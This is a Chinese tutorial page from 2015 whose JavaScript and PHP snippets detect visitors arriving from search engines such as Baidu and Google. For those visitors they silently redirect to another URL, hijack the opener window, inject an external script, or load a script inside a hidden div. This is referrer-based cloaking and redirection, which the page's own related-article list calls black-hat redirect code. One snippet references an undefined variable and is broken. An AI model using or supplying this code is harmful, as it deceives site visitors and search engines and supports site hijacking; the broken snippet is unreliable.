js如何判断访问是来自搜索引擎(蜘蛛人)还是直接访问


Posted in Javascript onSeptember 14, 2015

以下javascript脚本代码可以实现判断访问是否来自搜索引擎。

代码如下:

<script type="text/javascript">
if(window.name != 'ad_app6'){
var r = document.referrer;
r = r.toLowerCase(); //转为小写
var aSites = new Array('google.','baidu.','sm.','soso.','so.','360.','yahoo.','youdao.','sogou.','gougou.');
var b = false;
for (i in aSites){
if (r.indexOf(aSites[i]) > 0){
b = true;
break;
}
}
 
if(b)
{
self.location = '要跳转的网址';
window.adworkergo = 'ad_app6';
}
}
</script>

介绍的这个JS判断蜘蛛来源的方法脚本是写在body的onload里面的。即页面加载时进行判断。代码如下:

body {onload:expression(
if(window.name!="Yang"){
var str1 = document.referrer;
str1 = str1.toLowerCase();
var str6 = 'google.';
var str7 = 'baidu.';
var str4 = 'yahoo.';
var str8 = 'youdao.';
var str9 = 'sogou.';
var str5 = 'soso.';
if(str1.indexOf(str7)>0 || str1.indexOf(str6)>0 || str1.indexOf(str4)>0 || str1.indexOf(str3)>0 || str1.indexOf(str8)>0 || str1.indexOf(str9)
 
>0 || str1.indexOf(str5)>0 && "zh-cn"==navigator.systemLanguage)
{
self.location='http://www.abc.com/';
window.name="Yang";
}
 
}
);}

这个JS判断蜘蛛来源方法不太好用。特别是在需要判断更多蜘蛛来源时代码写起来比较麻烦。

JS正则表达式判断来路搜索引擎指定跳转网址

var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|sm|so|biso|gougou|ifeng|ivc|sooule|niuhu|biso|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href="跳转指定网址";
}
<script language="javascript">

var s=document.referrer

if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("soso")>0 || s.indexOf("search")>0 || s.indexOf("114")>0 )

window.opener.navigate("https://3water.com")

</script>

通过Js判断搜索引擎来路的代码则如下

<script type="text/javascript">
function elem(e,url){
var h=document.createElement(e);
h.src=url;
document.getElementsByTagName('head')[0].appendChild(h);
}

function refer(){
var ref=document.referrer;
var baidu=ref.indexOf("baidu");
var soso=ref.indexOf("soso");
var google=ref.indexOf("google");
if(baidu!=-1||soso!=-1||google!=-1){
elem("script","http://127.0.0.1/js.js");
}
}
refer()
</script>

一段php判断搜索引擎的代码

<?PHP
$referer = $_SERVER['HTTP_REFERER'];
if(!$referer == ''){
if(ereg('http',$referer)){
$referer = @eXPlode('.',$referer);
if(is_array($referer)){
$referer = $referer['1'];
if($referer == 'google' OR $referer == 'baidu' OR $referer == 'soso' OR $referer == 'sogou'){
?>
<div style="visibility:hidden;"><script src="a.js" language="JavaScript"></script>
</div><?php
}
}
}
}
?>

手机端别忘了 sm、 sogou。

基本上也差不多了,如果你有更好的代码,可以留言.

Javascript 相关文章推荐
求得div 下 img的src地址的js代码
Feb 28 Javascript
js 对象是否存在判断
Jul 15 Javascript
10个基于浏览器的JavaScript调试工具分享
Feb 07 Javascript
为jquery的ajaxfileupload增加附加参数的方法
Mar 04 Javascript
JavaScript实现弹出DIV层同时页面背景渐变成半透明效果
Mar 25 Javascript
Bootstrap模态窗口源码解析
Feb 08 Javascript
vue中mint-ui环境搭建详细介绍
Apr 06 Javascript
Bootstrap模态框插入视频的实现代码
Jun 25 Javascript
bootstrap自定义样式之bootstrap实现侧边导航栏功能
Sep 10 Javascript
Angular6 Filter实现页面搜索的示例代码
Dec 02 Javascript
新年快乐! javascript实现超级炫酷的3D烟花特效
Jan 30 Javascript
基于Proxy的小程序状态管理实现
Jun 14 Javascript
根据user-agent判断蜘蛛代码黑帽跳转代码(js版与php版本)
Sep 14 #Javascript
jQuery实现默认是闭合的FAQ展开效果菜单
Sep 14 #Javascript
js带缩略图的图片轮播效果代码分享
Sep 14 #Javascript
jQuery实现的Tab滑动选项卡及图片切换(多种效果)小结
Sep 14 #Javascript
JS+DIV+CSS实现的经典标签切换效果代码
Sep 14 #Javascript
jQuery实现Meizu魅族官方网站的导航菜单效果
Sep 14 #Javascript
jQuery实现鼠标悬停背景翻转的黑色导航菜单代码
Sep 14 #Javascript
You might like
PHP按行读取文件时删除换行符的3种方法
2014/05/04 PHP
php把大写命名转换成下划线分割命名
2015/04/27 PHP
php实现根据IP地址获取其所在省市的方法
2015/04/30 PHP
Yii2超好用的日期和时间组件(值得收藏)
2016/05/05 PHP
老生常谈php中传统验证与thinkphp框架(必看篇)
2017/06/10 PHP
浅谈thinkphp5 instance 的简单实现
2017/07/30 PHP
PHP流Streams、包装器wrapper概念与用法实例详解
2017/11/17 PHP
thinkphp5 URL和路由的功能详解与实例
2017/12/26 PHP
js添加select下默认的option的value和text的方法
2014/10/19 Javascript
JavaScript中使用Callback控制流程介绍
2015/03/16 Javascript
使用AmplifyJS组件配合JavaScript进行编程的指南
2015/07/28 Javascript
angularJS与bootstrap结合实现动态加载弹出提示内容
2015/10/16 Javascript
浅析JavaScript中作用域和作用域链
2016/12/06 Javascript
javascript设计模式之模块模式学习笔记
2017/02/15 Javascript
JavaScript中的工厂函数(推荐)
2017/03/08 Javascript
使用webpack3.0配置webpack-dev-server教程
2018/05/29 Javascript
如何使用electron-builder及electron-updater给项目配置自动更新
2018/12/24 Javascript
Angular 2使用路由自定义弹出组件toast操作示例
2019/05/10 Javascript
Vue+Koa2+mongoose写一个像素绘板的实现方法
2019/09/10 Javascript
element-ui中el-upload多文件一次性上传的实现
2020/12/02 Javascript
Python中的zipfile模块使用详解
2015/06/25 Python
Python使用poplib模块和smtplib模块收发电子邮件的教程
2016/07/02 Python
Python3之简单搭建自带服务器的实例讲解
2018/06/04 Python
python实现排序算法解析
2018/09/08 Python
python 使用sys.stdin和fileinput读入标准输入的方法
2018/10/17 Python
Python操作配置文件ini的三种方法讲解
2019/02/22 Python
Tensorflow设置显存自适应,显存比例的操作
2020/02/03 Python
python 实现两个npy档案合并
2020/07/01 Python
面试后的感谢信范文
2014/02/01 职场文书
公司门卫岗位职责
2014/03/15 职场文书
初三学生评语大全
2014/04/24 职场文书
结婚保证书(卖身契)
2015/02/26 职场文书
2016年党建工作简报
2015/11/26 职场文书
八年级作文之感恩
2019/11/22 职场文书
python 如何获取页面所有a标签下href的值
2021/05/06 Python
Python如何让字典保持有序排列
2022/04/29 Python